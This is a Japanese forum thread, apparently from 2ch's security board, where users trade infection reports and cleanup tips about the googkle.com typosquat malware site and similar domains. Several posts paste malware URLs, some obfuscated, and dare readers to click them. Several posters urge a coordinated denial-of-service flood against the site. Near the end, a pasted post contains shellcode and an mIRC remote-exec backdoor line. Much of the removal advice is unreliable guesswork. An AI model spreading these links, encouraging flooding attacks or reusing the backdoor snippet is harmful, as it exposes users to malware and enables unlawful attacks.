temp空にしてZoneAlarmもｸﾘｰﾝｲﾝｽｺでアップデート、でも
専ブラからのリンク踏み→ブラウザ読みが遅い。まだ何か除去できてない
のかと首を捻っていたら


新しく入れたewidoのリアルタイムプロテクションでした。

テキストブラウザLynxでアクセスすれば無問題

>>130
亀ﾚｽだがバスターのURLブロックはIEのみ

間違って踏んじゃいました。
ノートンが削除してくれたけどこれで安心してもいいのかな？

3000

狐にもURLフィルタがあればいいのにな

lunascapeはURLフィルタがついていたのでさっそく追加

>>301
俺はadblockに登録してるよ

F-Secureでスキャンして１個それっぽいのが見つかったので
Cドライブ重要ファイルを全部Dドライブに移してたからこんな時間になっちゃった

駆除は出来ないみたいだったけど、該当ファイルをｿﾌﾄで削除した
再起動しても再生されてないみたい

助かったのか？

どうしてこうも度胸のある奴が揃ってるかなこの板は（ｗ；
わざわざ危険犯さんでも良かろうに

IEの制限サイトに登録してもページ開けるじゃん・・・
感染したのだろうか・・・

unDonutにはURLフィルタない？

>>305
臆病者は逃げてろ。

普通に、専ブラでブラクラ登録したらええやんけ？

ttp://srd.yahoo.co.jp/PAGE=P/LOC=P/R=1/*-http://www.googkle.com/
これも踏んだら飛ばされるの？

>>307
ある

>>310
うわー、悪質やなぁ。

結局、感染したらどうしたらいいの

なんで感染するの？

感染ってなあに？

>>306
制限サイトはデフォルトで「セキュリティ高」だから
スクリプトやらプログラムやらの実行は防がれると思うが・・

>>316
スパイウェアが入るって事は？

スパイウェアくらいどうってことないだろ、トロイに比べたらな
そのうちうｐデートでスパイボットやアドウェアで対応できるだろうし

金目のサイトを利用している人にとっては、どうってことないことはない。

もう、googkle落ちてるよ。
さっき踏んだら404か403だったから。

>>306
IEの制限サイト≠アクセス拒否じゃないので注意。

>>320
馬鹿やろう！！マルウェアだらけになっちゃまいsふぁおいおふぁうーー！1

http://www.microsoft.com/japan/security/incident/download_ject.mspx

タコがあ！　このパッチを適用していたら無害だ
よくもまあ、そんな知識でセキュ板をふらついていられるな
IEの一番危険な脆弱性だ ！
さっさとウィンドウズアップデートして来いよな

はい　餌を与えないでね　帰った　帰った　

-----------------------------------終了----------------------------------

今このサイトは死んでいます
復活するまで待ってください

究極age

ｱｹﾞ

やべ　あげれてない

ネットカフェから突撃したら落ちてた。
おまいら、安心汁。

田代砲が原因？

なんだ結局ノートンじゃ検出できなかったんだ
かわいそうに

AVGは？

さっきPCが勝手に再起動してﾋﾞｸｰﾘした
そういや一昨日googkle踏んだけど関係無いかな？

ナイス各種田代砲
そんな糞サイトはｲﾗﾈ

>>332
落ちたのってやっぱ田代砲のせい？

>>333
数人で撃ち込んだんじゃないの？

犯罪だけどそういう使い方ならイイような気がする

>>334
正当防衛みたいなものかな・・・

田代砲が人のためになったのを初めて見た。

何だよ。ソース貰いに行ったら落ちてるんじゃん。出遅れた。
各種exe欲しかったのに……。

落ちたとか言って踏ませようとしてるのでは？
それとも本当に落ちたんですか？

いや、マジでサイト自体がなくなってるぽい。

再インスコしたら､すっきりしてかえってよかった｡



負け惜しみ禁止

infoseekのアクセス解析にログインできなくなっちゃったんだけど、なんか関係ある？

>341
JavaScript無効にしたままとか。

>>342
個別設定で有効にしてます。

何も考えずに踏んでしまったが、もう既に落ちてたみたいでセーフ。

という昨日の夜には既に404じゃなかった？

Regseeker でレジストリを綺麗にするのが一番簡単じゃないかな？

木曜の夜に踏んでしまった。
いまのところ不具合はなにもない。

>>347
見えないところで動いてますからね

スパイボットで削除！
これでOK？
ところで404て何ですか？

>>349
気にするな。

>>350
教えてよ。゜（ﾟ´Д｀ﾟ)゜｡ｳｧｧｧﾝ

>>348
暫くの間つきあってみる

>>350
俺は明日のGIの予想で忙しいから。今度ネ。

>>353
（ＴＴｸﾞｽﾝ

◆クリック・オンライン
　　-Click Online-

かつてない速さのインターネット接続、ブロードバンドは、現在
世界中の
一般家庭で利用できる。しかし、コンピュータユーザーが、はた
して
それほどの回線容量を必要とするのだろうか？超高速接続の弱点
を探り、
インターネット上の交通渋滞地点を明らかにする。また、インタ
ーネットの
将来は、テクノロジーの未だ発達していない途上国でにおいても
、今後
これまでのような成功を収めるのかどうかを検証する。

4／29（金）★04:30〜05:00、18:30〜19:00
4／30（土）15:30〜16:00
5／ 3（火）01:30〜02:00、16:30〜17:00
5／ 4（水）22:30〜23:00

放送内容やストリーミングは、http://www.bbcworld.com/clickonline（英語）

ここの住人には無縁なんだろうけど
サイト見ただけで感染すると初めて知った
セキュリティホールでそんなことあると聞いてたが
OSだけでネット巡りは危険なのかねぇ

OSだけでネット巡り

OSだけでネット巡り

>>320
悪気が無いのが一番困る
http://www.itmedia.co.jp/enterprise/articles/0504/28/news017.html
http://pc8.2ch.net/test/read.cgi/sec/1114650396/

誤爆しちまった
ごめんなさい

>>351
404=指定したﾎｰﾑﾍﾟｰｼﾞが見つかりません
てやつ

>>357-358
Microsoftは、こうやって
知っておくべき概念すら知らないまま使えるパソコン、にしてしまった。
IEがWinの一部となったのはもう昔の話、もうプレイヤーやらFWまで・・・・

知らないで使わせるなら安全性に責任持てよと

>>362
つか、Microsoftはパッチを出してるから、いちおう対応はしているのでは。
パッチを当ててない奴は(ry

googlke開いちまったんだが、ノートン先生が警告出して来た。
これは防御されたのか？

もう落ちたんじゃなかったのか？

>>368
スパイウェアがドッサリ

↑
？？？

みんななんか落ちてたのにまた復活した模様
再び踏まないように警告
and田代砲いくぞ@明日

心当たりがありF-Secureで検索したところ30個検出。
バスター反応なし。

なんで復活するのか・・・

田代砲撃つしかない・・・
撃たないと駄目かもわからんね。

被害者も多いみたいだし・・・

OSだけでネット巡る被害者が増え続けるわけだな

みんなで田代撃ちまくろうぜ(･∀･)
500発ぐらいよ!

2ちゃんブラウザなら感染してもブラウザごと削除すればウイルスも消えるみたいだけど・・・

田代砲の安全装置ってどういう意味？

＞2ちゃんブラウザなら感染してもブラウザごと削除すればウイルスも消えるみたいだけど・・・

２ちゃんねるを見るソフトがウイルス感染するワケが無い
たぶん「スレッドのログデータの中でのウイルスコード的書き込みを誤検出」のこと言ってんだろうけど無意味

>>377
２ちゃんのログが感染したらゴミ箱にポイってすればいいんじゃないの？

ウイルスコードでもスキャンしたら引っかかるのか？

>>377
なるほど。それでスキャンに引っかかったんだ・・・
理解しますた。

>>370
うちはF-Secureは一つも検出なし。
ノートンで4個、バスターで4個、AVGで3個検出。

踏んじゃった。
ノートンがブロックしてくれて、そのあとスキャンしたら四つほどでてきた。
スパイウェアも駆除したけど、ワームが恐いので、ネットにつなげてＣＰＵ使用率とネットワーク使用率を調べてみた。
つなげてるだけで１０％を上回ることはなかったから大丈夫かな？

ＣＰＵ使用率とネットワーク使用率はどうやって調べるのですか？

Windows画面下部のタスクバーと呼ばれる部分を右クリックしてタスクマネージャ
「パフォーマンス」と「ネットワーク」でわかる
だが、あまりたいした事は分からない

>>378
別にポイしなくてもいいじゃん、感染違うし

>>384
ありがとです。
>>385
そうですね(;^ω^)

たった今踏んでみたが落ちてるみたいだな。

>>382
今が大丈夫でも意味ないと思うが

10％上回らないからと言って大丈夫と決めつけるのはいかがなものかと。

洋サーチサイトに繋がったり繋がらなかったりするみたい。
無闇に踏まないように・・・

何だ、また落ちてるな。出先で開いたから楽しみにしてたのに、帰ったら開かないじゃないか。

また田代砲の艦砲射撃を受けているのか・・・

まさか田代砲が世のため人のために役に立つ時が来るとは！

田代砲発射させたのは誰だ？

(･∀･)ウホッ

踏んでしまいノートン先生が反応したんですが、オンラインスキャンで検出されなければ問題ないですか？

googkleは死んでるから問題無いよ。

F-Secureのオンラインスキャンしたら４５個見つかった。
あせった。
見つかった奴見てみると、ノートンの検疫のバックアップの物だった。
それ全て削除してもう一度やってみたら０だった。

冷や汗かいたわ

XPSP2でのsvchostの数っていくつ？
なんか7つもあるんだけど・・・

俺は５つ。

local
network
sysytem

以外はヤバイ。

種類はその3つだけどnetworkservicって2つあっても問題ない？

おいsvchost.exeってＸＰＳＰ２の場合普通6つって聞いたんだが俺のは7つあるんだ
svchostが多い理由ってどんな場合があるんだ？
ちなみにユーザー名のところには
local service
network service
sysytem
の3つがある

すまんスルーよろorz

>>397
死んだり生き返ったりもう(ry

落ちたな

田代砲？

木曜日から踏んで放置しているがなんともない

ｸﾞｰｸﾞｸﾙｲｲﾜｧ....

復活したら田代砲撃てば？

F-Secure オンラインスキャンしたけど感染0だった。

よかったよかった

>>410
そこのオンラインスキャンは取りこぼしが多くは無いか？
トレンドやSymantecのオンラインスキャンの方が検出率高い見たいだぞ。

つーかノートンで検出されなかったらおｋなわけ？
俺最新版でスキャンして何も見つからなかったけど、アドウェア、スパイボット、ewidoとかでスキャンすると
マルウェアとか結構検出されたぞ

http://sea.search.msn.co.jp/dnserror.aspx?FORM=DNSAS&q=www.googkle.com

はいはい死ね

>>276
ｸﾙｯｸｩ...♪

踏んだ後放置続行中
変化はオイラの股間が痒くなってきたことぐらい

あるあるｗ

鹿島台町ホームページ
http://www.town.kashimadai.miyagi.jp/
一番下の掲示板開いてみろ

>>418
JS_CBASE.EXP1？

パソコン蛾ないた

ググクル踏んでもないにもおこらないけど
もう消えたのか？

ソフトやオンラインや種類で精度がまちまちだなぁ。
バスター低くねぇ？

>>1
なんで呼びかけてるとこで検索してもちゃんと検出されないかな

潰れないとずっと2chのどこかで貼られ続けるわけだな

復活してるっぽい？

まずポップアップブロック。物理的に感染しないはずだ
それからSP2適用してれば大丈夫

>>422
誤検出が少ないんだろ。

Googkle is no more
Remember the diary four days ago when we were reporting a number of
malware sites that were conveniently hosted only a typo away from
google.com? Yesterday, the DNS hoster (joker.com in Switzerland) has
finally taken action and has suspended DNS services for all the
malware zones (ghoogle, googkle, etc). Good news for a change.
http://isc.sans.org/diary.php?date=2005-04-30

グックグルは死んでいても、これは生きている
ttp://www.ntsearch.com/popengine/popup3.htm
このソースだとよ

www.googke.com/intl/ja/はヤバい？

このＵＲＬクリックしてもつながらないよ？

そういって俺に踏ませようとしてるんだろ？
騙されないぞ

これって、ブラウザがFirefoxでもやばいの？

ブラウザがなんだろうがポップアップさせたらダメってこったろう。
セキュリティは強にしとけってこった

トロイ対策はa2freeで十分ですか？

連休前にYahoo！で>>1の記事を見て早速クリック。
時間はちょうどこのスレがたった頃。
PCにはウイルスキラーがインストール済だった。
ポップアップブロックを解除したら延々何かダウンロードしてる。
一分以上は放置してたけど流石に気味が悪くなって切断した。
その後はインターネットしてると勝手に広告のページが開いたり、
何もして無いのに「ネットワーク接続が見つかりません」とエラーが
表示されたり、PCの動作マターリ、IEの異常終了（フリーズ）連発で、
さすがにウイルス感染てんこ盛りの予感がして慌てた。
仕方ないので
ウイルスキラーでスキャン→検出なし
ウイルスバスター体験版でスキャン→検出なし
Spybot、Ad-awareでソレっぽいの何個か削除→でも改善されず
OS再インストールしかないと諦めて、今日までPC放置してたが、
試しに>>1の記事にあったF-Secureアンチウィルスの体験版を
インストールしてスキャンするとトロイの木馬系10個近く検出されて、
PCの不調も直った。
その時は素直にスゲエと思ったが、後で良くよく考えてみると、
話が出来すぎてて、なんかあやしいな。

俺もいれてみよっと

F-Secureでスキャンしたら２ちゃんのログが引っかかった。ｗ

何でIE使うんだよ馬鹿が

ログフォルダだろ

で、まだこのサイト残ってるの？

間違えて飛んだけどなんともなかった・・・・ｱﾌﾞﾅｲ・・・
ポップアップを消す奴やってたのがよかったんだろうか。。。

はい、感染者また一人はいられました


見えないとこでうじゃうじゃしてるぞ、マジで

スパイボットで検索したらいいんじゃない？

スパイボット、アドウェア、ノートン、ewido、最新版でスキャンしても見つけれないやつ多数ありますた
めんどうだから再インスコした

>>443
ｱﾄﾞｳｪｱつかった。
専用のチェックもしてもNot foundだった。
4日くらいたつけど何も異常なし。

それでもやばい？；；；；
また怖くなってきた・・・・

>>446
とにかく複数のソフトつかってスキャンすることをお勧めする
一つしか使ってないのに安心はしちゃいかんよ

俺はどうしたらいい・・・
ＯＳとやらをインストールすればいいのか。（ここきたのはじめて

>>447
ありがとう。
spybotってやつをやってみる。ほんとありがとう

>>449
ewidoも使っとけ

>>450
そうします。
ありがとうございます。
怖い・・

俺も>>436に似た症状になりますた。
新しいウインドウを開くと、その上に丁度同じ大きさの広告ページが
被さってきて事実上PC使えなくなった。
回線切断してても出てくるので、その広告サイト（数種類有り）は
自分のPCに保存されてるっぽい？
ウイルスバスター、スパイボット、アドウェアの最新版じゃ直らなかったけど、
F-Secureの最新版ダウンロードして使うと確か5〜6個引っかかって直ったよ。

F-Secureインスコすんのにノートン消すのﾏﾝﾄﾞｸｾ
わかりやすすぎ

WebrootSpySweeperも３０日体験可能だから使ってみるのもいいのでは？

やっと終わった
ewidoの結果で37個も削除失敗がでたんですがこれはいったい？
「Spyware.Tracking-Cookie -> 削除中にエラー」だそうです

>>454
それもやってみます

リカバリした方が早い気が・・・

CookieとIETemp捨てれ

Cookie削除しました。
IETempとは？

>>438
それやってみます

ショボノートＰＣだから途中で落ちちゃってスキャンできないorz
やるだけのことはやったか・・

変なdatファイルが生成されてる・・・；

ttp://p16088-adsau16honb11-acca.tokyo.ocn.ne.jp/
ｗｗｗｗｗｗっっｗｗｗｗｗｗうはっｗｗｗｗｗｗｗｗｗｗｗｗ
うはっｗｗｗｗｗｗおｋｗｗｗっうぇｗっｗｗｗｗｗｗ
っｗｗｗうぇｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ
おｋっｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗっ
おｋうぇ

↑
これは・・・・IP？
俺のと酷似しているがなんなのだろうか。

>>461

これなんですか？

>>461　山田

デンキジャナイヨウィルスダヨ

山田とぐっくる、GW感染多いのは、さあ！DOCHI！

はあああああぶねええええええええ
googkleの次は山田にかかるとこだたーーー！！！！

>>463
新種のマルウェア

４６１のあれクリックしたらどうなるの？

死ぬ

死にはしない。ウイルス感染もすることもない。ただ内容が表示される場合があるだけ

表示されたのまだ見たことないな

IP抜かれるだけ

IP取得方法にバグ（？）がありプライベートIPが書き込まれる場合や、
ルータ・FWなどでポートがふさがれるため、アクセスできてしまうアドレスは少ない。

マルウェアって何よ。
おまるかと思っちゃったじゃないのよ。

マルウェア
コンピュータウイルス、ワーム、スパイウェアなどの「悪意のこもった」ソフトウェアのこと。「mal-」という接頭辞には「悪の」という意味があり、これとソフトウェアを組み合わせた造語である。

遠隔地のコンピュータに侵入したり攻撃したりするソフトウェアや、コンピュータウイルスのようにコンピュータに侵入して他のコンピュータへの感染活動や破壊活動を行なったり、情報を外部に漏洩させたりする有害なソフトウェアのことを言う。

でも山田はクリクしてもたいしたことないんでしょ？してないけど

spybotで検索したら、webtrendsliveとか出てきたんだけど、これ?

>>477
何かの実行ファイルで感染した人が晒されてるだけだから
クリックしてももちろん問題はない・・・と思う

クリクてアドレスのことかYO

【トラックバック来たよ】 (ver. 0.11)
[タイトル] トラックバック荒らしおもすれー（ ＾ω＾）
[発ブログ] ニュース速報＠2ch掲示板
http://news19.2ch.net/test/read.cgi/news/1115026311/l50
( ref= http://news19.2ch.net/test/read.cgi/news/1115026311/l50 )

[＝要約＝]
トラックバック荒らしおもすれー（ ＾ω＾）

>>479
不正アクセス禁止法でやられるかもね

といかググクルとか貼りまくってる人とか違法じゃないの？
訴訟起こされたらどうなるんだろう・・

googkle.comでググると、
「URLが正しい場合は、ここからgoogkle.comを開いてみてください。 」
で生きたリンク貼ってあるんだけど…修正する気ねえのか？ぐーぐる

ググクル自体はもう落ちてるんじゃない？

ポップアップブロッカー使ってたらだいじょうぶですよね？

全然

>484
googkleでググるとたしかに検索されてきた。
↓そのときの画面あり
http://ane-choco.cocolog-nifty.com/choco/2005/05/googkl_5ae1.html

仮想ＰＣ使っててもやっぱ怖くてクリックできん。
んで、同時に検索されてきたrunandmonkey.comってのもなんだか怪しい。

ふ、ふんでしまったんだが・・・まかふぃーさんが激しく反応した。処理したら平気・・・だよな

どんまい・・

ヽ(`Д´)ﾉ

【どんまい】気にするな、を意味する英語。Don't mind. ドンマイと片仮名で表記することが望ましい。

おまいらググクルはもう田代で落とされて氏んでるお。
今行ったけどなかったよ 復活する気はないらしいな

どうせまた復活するんだろ

誰が落とした？

田代が

トップページ逝っただけで即死なんですか？

ところでポップアップウインドウってなんでしょう？

勝手に開いてくるじゃねーか
XPSP2だとデフォでブロックされるけど

http://YahooBB219026012201.bbtec.net/

ｗｗｗｗｗｗｗｗｗｗｗｗうはっｗｗｗｗおｋｗｗｗ

ｗｗｗｗｗｗうはっｗｗｗうぇｗｗｗうぇｗｗｗうはっｗｗｗ
うぇｗｗｗｗｗｗｗｗｗおｋｗｗｗ
うぇｗｗｗ

氏ね　　

亜種は晒されるのか

h抜きがあるみたいだが、亜種関係なく晒されとるだろ

もう山田ってほとんどの板にいるな

最近よく見るね。流行り？

山田VIPとか行けば良いのに。
いっぱい人居るよ。

ポップアップブロックされたら平気ってもんじゃないんか？

結局「〜してたら絶対安全」ってのが分からんな、ぐぐくる

>>122,125
ファイル名（例えば「~e5d141.tmp」）とかでぐぐって見る

http://pc8.2ch.net/test/read.cgi/sec/1114650396/
ここ見て対処方法考えるしかないかもわからんね

やべ　間違えた
すまん

m9(^Д^) ﾌﾟｷﾞｬｰ

とりあえず貼っとく。
http://www.googk|e.com/

とりあえず、って・・・・・・・・・・

ｸﾞｰｸﾞｸﾙってどんなサイト？
一度か二度ｸﾞｰｸﾞﾙに酷似したサイトに行ったことがあるんだけど、
ｸﾞｸﾞｸﾙはｸﾞｰｸﾞﾙに似せた作りですか？

見た目は全然似てない

>>513

とりあえず　とりあへ― 3 4 【取り▽敢えず】

（副）
〔取るべきものも取らずに、の意から〕
(1)いろいろしなければならないものの中でも第一に。さしあたって。まずはじめに。
「―これだけはしておかなければならない」「―お知らせ申し上げます」
(2)すぐに。直ちに。
「取るものも―かけつける」

そっちかよ

ごめ　上げちまった

>>512
ぶっころすぞ

>>515
そうですか！良かった。

>>519
釣られてどうする。
「l」じゃなくて「|」だろ

>>519
２ｃｈ的には「ぬっころすぞ」が正しい用法です。

www.gooogle.com

>>521
あ！

>522
いや、「ぶっ死ろす」では

>>523
普通のgoogle

とりあえず貼っとく。
http:://www.noodle.com/

すまん、手が滑った。
http://www.googkle.com/

とりあえず貼っとく
http://www.(^^).com/

http://www.noodle.com/

>>525
ぷっころす

ピッコロす

>>522
特撮？
>>532
オークション板？

特撮板は ムッコロス だろ

ぽっころすなんていかがですか？

なんじゃそりゃｗ

ぱっころすがヌけてルポ

ガッ

とりあえずF-secureのオンラインスキャンで
異常なければおｋ？

踏んだけど全く平気だよ。ちなみにFirefox。

当たり前だろ馬鹿

「ブッ殺す」・・・そんな言葉は使う必要がねーんだ
なぜなら　オレやオレたちの仲間はその言葉を頭の中に思い浮かべた時には！
実際に相手を殺っちまって　もうすでに終わってるからだッ！

そもそもgoogkle.comなんてタイプミスなんかするか？

ていうか、わざわざ手打ちでグーグルにアクセスするか？

>>544
ボクみたいな通は手打ちでアクセスします。

hostsファイル書き換えたので、タイプミスしても大丈夫。

ググクルってまだ生きてんの？
もう無くなった？
確認できる猛者はいないか？

googkleもう無くなっちゃったの？残念。

大分前にお亡くなりになりました

田代砲を食らったと聞いたが真実？

何回も落とした

http://wwwgoogl.com/

みんなよくがむばったね　By 田代

だがグーグクが生きている

hosyu

>>552
踏んじゃったｗ

問題ないはず

552
は踏んでも大丈夫なのか？

552
トロイ検出した

ttp://www.goggle.com/

www.ｺﾞｯｺﾞﾙ.com

>>23って見て平気？

まちがえた
>>19は見て平気？

●..●...●●...●●●●...●●.....●.●●.●..●.●●●....●●●...●.●.●●

ウイルス対策ソフトの検出力結果
http://www.geocities.co.jp/SiliconValley-Cupertino/2010/security.html

●●..●..●●.●●....●.●●.●.●●●●●..●.●●●...●..●●.●....●●

どうでもいいんだけどgoogleで検索するとトロイが引っかかるんだけど
それって俺だけか？

　　　　　　　, '´　　　　　　　　　:::::::::::ヽ、
　　　　　　/　　　 　,／ |||　＼,　　::::::::::ヽ
　　　　　　|　　 =="　　　　 　　`==　::::::::|
　　　　 　|　　　-=・=-′　ヽ-=・=-　:::::::::|
　　　　　 |　　　 　　　　　　　　　　　::::::::::| 　　え？
　　　　　　|　　　　　（＿人＿）　　　::::::::|
　　　　　　 'ヽ＿＿　　　　　　　　:::::::::::/

　

www.gookgle.co.kr

この手のアドレスはうざいから
2ch専用ブラウザのNGワード登録＆ファイアウォールで
ドメインごと接続拒否にしておくと、ちんこもりもりって感じ

今公共のパソから来てる。　
ふんでみようかなｗｗｗｗｗ

もう無いんだろ？

574get

ついでにhttp://www.googkle.orz1

こんなん素敵かも。

http://www.google.co.jp/url?sa=U&start=4&q=%68%74%74%70%3A//%77%77%77.%67%6F%6F%67%6B%6C%65.%63%6F%6D

なんだもうないじゃん

あけおめ

>>578
おめ

hosyu

www.fack.com
これもgoogkleと同じみたい。

勇気のある奴踏んでみろ

アクセスしたけど消えてるっぽい

失礼、一応それらしき(？)ページは出てきたけど
ウインドウサイズ変えられて閉じたページが復活してしまう事くらいだった・・・

【セキュリティの要とは】

トラブルが多くて、効果が不確実なアンチウイルス製品などに頼り切るよりも、
怪しげなファイルは実行しないという【基本】を重視しよう。
アンチウイルスなどを頼ってばかりでは駄目(´･ω･) ｽ

例）
>NOD32　主なトラブル履歴
>
>2005年9月ブルースクリーンが生じてWindowsが停止する問題が再発。リリース中止。
>http://canon-sol.jp/product/nd/nd_update.html
>レジストリが破壊されてWindowsシャットダウン時にブルースクリーンとなる問題
>登録済みのアプリケーションが強制削除される問題
>http://canon-sol.jp/product/nd/v20008.html
>通信不能となって最悪の場合はOSがリブートの繰り返しになる問題
>http://canon-sol.jp/supp/nd/wndt4210.html
>スキャンすると受信メールの全部が削除される問題
>http://canon-sol.jp/supp/nd/wndt7003.html
>プリンタとの相性で印刷不能になる問題。
>http://canon-sol.jp/supp/nd/wndt4205.html
>Windowsアップデートができなくなる問題
>http://canon-sol.jp/supp/nd/wndt4212.html



たとえばnyやるなら、個人情報の類がまったく入っていない、
ｎｙ専用のセカンドPCも用意しなくちゃ駄目(´･ω･) ｽ
厄介な新種、亜種に感染したらOSごとクリーンインスコ。

goggle.comはいまだに健在な件について

http://www.geocities.jp/umittin/goggle.html

http://clicksite.com

「Gooogle」に要注意、偽の検索でマルウェアサイトに誘導 - ITmedia エンタープライズ
http://www.itmedia.co.jp/enterprise/articles/0802/05/news035.html

Googleに見せかけた偽のサイトで検索すると、マルウェアのインストールを促される。
　セキュリティソフトメーカーのTrend Microは、IEのスタートページをGoogleの偽サイトに変えてしまう
トロイの木馬の感染サイトが見つかったと報告した。

　問題の悪質サイトはイタリア語で、インドの旅行会社を装って「registrazione.exe」という
トロイの木馬ファイルをインストールしようとする。感染すると自動的に、旅行サイトとは無関係の
星占いサイトにリダイレクト。ここからさらに、別のトロイの木馬などのマルウェアコンポーネントをダウンロードする。
　ダウンロードとインストールが完了すると、エラーメッセージが出てInternet Explorer（IE）がクラッシュし、
改めてブラウザを開くと、IEのスタートページがGoogleを装った偽サイトの「www.qoogler.com」になっている。
このページは一見、Googleサイトに見せかけてあるが、よく見るとロゴが「Gooogle」になっており、
先ほどの星占いサイト「AstroGooogle」へのリンクも記載されている。
　このGooogleサイトで例えば「trendmicro」を検索すると、IEの問題を解決するためと称して
新しいプログラムのインストールを促される。このファイルをダウンロードすると、さらに別のマルウェアに感染し、
qoogler.comのURLを使ったアダルトページに誘導されるという。

【ネット】「Gooogle」に要注意
http://mamono.2ch.net/test/read.cgi/newsplus/1202216508/

127.0.0.1 localhost
127.0.0.1 googkle.com
127.0.0.1 qoogler.com
127.0.0.1 gigigi.net
127.0.0.1 snipr.com
127.0.0.1 cunt.multiservers.com

www.qoogler.comに
制限付き＆クッキーブロックで乗り込んだら
Activeの警告でた・・・
絶対無視しろ！まだこいつ生きてたのか・・・
絶対行かないほうがいい（制限付きにして見るだけなら○）

www.qoogler.comは今医療保険被リンク集とかになってる。

hosyu

4 ：ｚ：2010/08/28(土) 10:25:02 ID:NtVfNVmU0
452 ：動け動けウゴウゴ２ちゃんねる：2010/07/10(土) 15:53:49.30 ID:7Cr427LS0
>>440
・プロバイダの新しい有料メールアドレス
・ジャパンネットバンク銀行の使い捨て番号のVISAデビット
ニ.フ.ティ.ーの100円のメアドプラスで認証が通った。
認証できたら、メアドプラスは登録解除してOK。
普通のクレジットカードでは漢字の住所が登録できたが、
ジャパンネットバンク銀行のVISAデビットだとローマ字入力の住所を要求された。

ローマ字の書き方はこれ
ヘボン式ローマ字綴方表
http://www.seikatubunka.metro.tokyo.jp/hebon/

漢字住所でどんな順序でどんなローマ字、番地の番号を使ったかは、
メモ帳でメアド・パスワードと一緒に控えておいたほうがいい。
453 ：動け動けウゴウゴ２ちゃんねる：2010/07/10(土) 15:55:00.00 ID:t966sYmN0
ローマ字変換
eip=eip+unescape("%u7030%u4300")
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
n0=on 900:text:!exec*:*:{.notice $nick Execut comanda: $2-
http://www2u.biglobe.ne.jp/~yuichi/rest/kanarome.html
454 ：動け動けウゴウゴ２ちゃんねる：2010/07/10(土) 15:56:54.59 ID:qfPgiwgp0
●買うなんて荒らしと一緒だぞ
455 ：動け動けウゴウゴ２ちゃんねる：2010/07/10(土) 15:58:50.21 ID:d455Pgrw0
荒らしが運営に喧嘩売っても被害を被るのは巻き添え食らってる人だけっていう…
荒らしたもん勝ち
456 ：動け動けウゴウゴ２ちゃんねる：2010/07/10(土) 15:58:54.30 ID:sPPrGi160
荒らしが●を買ったんだとしたら、個人情報登録してるんじゃないのか？
それで同一名義のアカウント全部停止するとか、
新たに買おうとしてきても拒否するというのはできないんだろうか？

ほんまでっか

596